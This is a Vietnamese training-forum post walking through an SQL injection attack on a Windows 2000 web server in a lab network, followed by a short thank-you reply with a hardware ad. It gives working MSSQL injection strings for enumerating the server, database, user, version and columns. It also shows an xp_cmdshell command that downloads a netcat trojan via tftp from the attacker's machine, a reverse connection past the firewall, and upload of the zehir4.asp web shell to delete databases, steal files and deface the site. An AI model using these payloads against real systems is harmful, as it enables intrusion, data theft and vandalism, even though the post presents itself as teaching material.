Xin chào ! Nếu đây là lần đầu tiên bạn đến với diễn đàn, xin vui lòng danh ra một phút bấm vào đây để đăng kí và tham gia thảo luận cùng VnPro.

Announcement

Collapse
No announcement yet.

Tấn công Web server SQL injection

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
  • #1

    Tấn công Web server SQL injection



    Trong bài này Hacker (máy 192.168.1.44) sẽ thông qua Port Web để tấn công vào Server 2000(192.168.1.46) và sẽ upload lên Server 2000 trojan webbase, sau đó kiểm soát Server này. Đầu tiên sử dụng phần mềm Acunetix để quét xem Server Web có bị lỗi ứng dụng gì không??


    Ta có thể test bằng tay trong tình huống này bằng cách thêm dấu “ ‘ “ trong form login

    Sau đây là 1 số đoạn mã để lấy thông tin về Server khi biết Server bị lỗi SQL.


     1/lay ten Server name


     'and 1=convert(int,@@servername)--sp_password


     2/lay database name


     'and 1=convert(int,db_name())--sp_password


     3/kiem tra system user


     'and 1=convert(int,system_user)--sp_password

    4/'and 1=convert(int,@@version)--sp_password


     5/Lay thong tin table userinfo


     ' having 1=1-- (xem table hien hanh)


     ' group by userinfo.username having 1=1-- (xem column tiep theo)


     Sau khi lấy thông tin về Server, Hacker thử upload lên Server trojan netcat bằng cách sử dụng gọi hàm shell trong SQL và tftp. Ta đánh vào form login câu lệnh sau(phải nhớ là máy client sử dụng TFTP Server):


    '     ;exec master..xp_cmdshell "tftp -i 192.168.1.44 get nc123.exe";--
     Câu lệnh này được thực thi ở hệ thống Server thông qua SQL, nó sẽ load nc123.exe từ TFTP Server 192.168.1.44. Ta kiểm tra trên TFTP Server file đã được gởi hay chưa.

    Sau khi upload thành công trojan netcat, việc bây giờ là ta phải chạy nó và sử dụng telnet ngược ra bên ngoài. Vì lúc này chúng ta đang đứng sau Firewall nên không thể lắng nghe trên port vì client ở ngoài Firewall không thể connect vào được.


     Chạy lắng nghe ở phía Client

    Telnet net ngược ra ngoài từ Server.

    Và kết nối netcat được hình thành sau khi telnet ngược ra từ Server, lúc này chúng ta đã by pass được Firewall.

    Sau khi kết nối được màn hình console của Window, ta tiếp tục upload thêm 1 trojan dưới dạng web thông qua TFTP
    Trojan web mà chúng ta sử dụng là zehir4.asp, đây là trojan khá nhiều tiện dụng. Từ trojan này ta có thể thực hiện dễ dàng việc xóa Database, việc download các file từ Server 2000 về máy của mình thông qua Port Web
    Ly database

    Thay đổi hình nền của trang web(deface)

    Tóm lại lỗi SQL Injection không những giúp Hacker có nhiều thông tin về table, column mà có thể cho phép Hacker sử dụng những lệnh thực thi hệ thống(trong 1 số trường hợp) và có thể upload trojan vào hệ thống Server.

    Anh Hào
    Last edited by phamminhtuan; 01-01-2011, 02:07 AM.
    Phạm Minh Tuấn

    Email : phamminhtuan@vnpro.org
    Yahoo : phamminhtuan_vnpro
    -----------------------------------------------------------------------------------------------
    Trung Tâm Tin Học VnPro
    149/1D Ung Văn Khiêm P25 Q.Bình thạnh TPHCM
    Tel : (08) 35124257 (5 lines)
    Fax: (08) 35124314

    Home page: http://www.vnpro.vn
    Support Forum: http://www.vnpro.org    		 - Chuyên đào tạo quản trị mạng và hạ tầng Internet
    - Phát hành sách chuyên môn
    - Tư vấn và tuyển dụng nhân sự IT
    - Tư vấn thiết kế và hỗ trợ kỹ thuật hệ thống mạng

    Network channel: http://www.dancisco.com
    Blog: http://www.vnpro.org/blog
    Tags: None
  • #2
    Tks bác..........
    Bán, cho thuê core Switch cisco, firewall dòng 6500 đầy đủ các option: sup1, sup2, sup 720, port đồng, quang….. Firewall Juniper 5400 có license cho nhiều user rất phù hợp với kinh doanh trong trung tâm dữ liệu. Bảo đảm giá cực kì tốt, hiệu quả so với mua mới - Contact: 0917.866.455 Danh (Mr.)

    Comment

    Previous template Next
    Working...
    X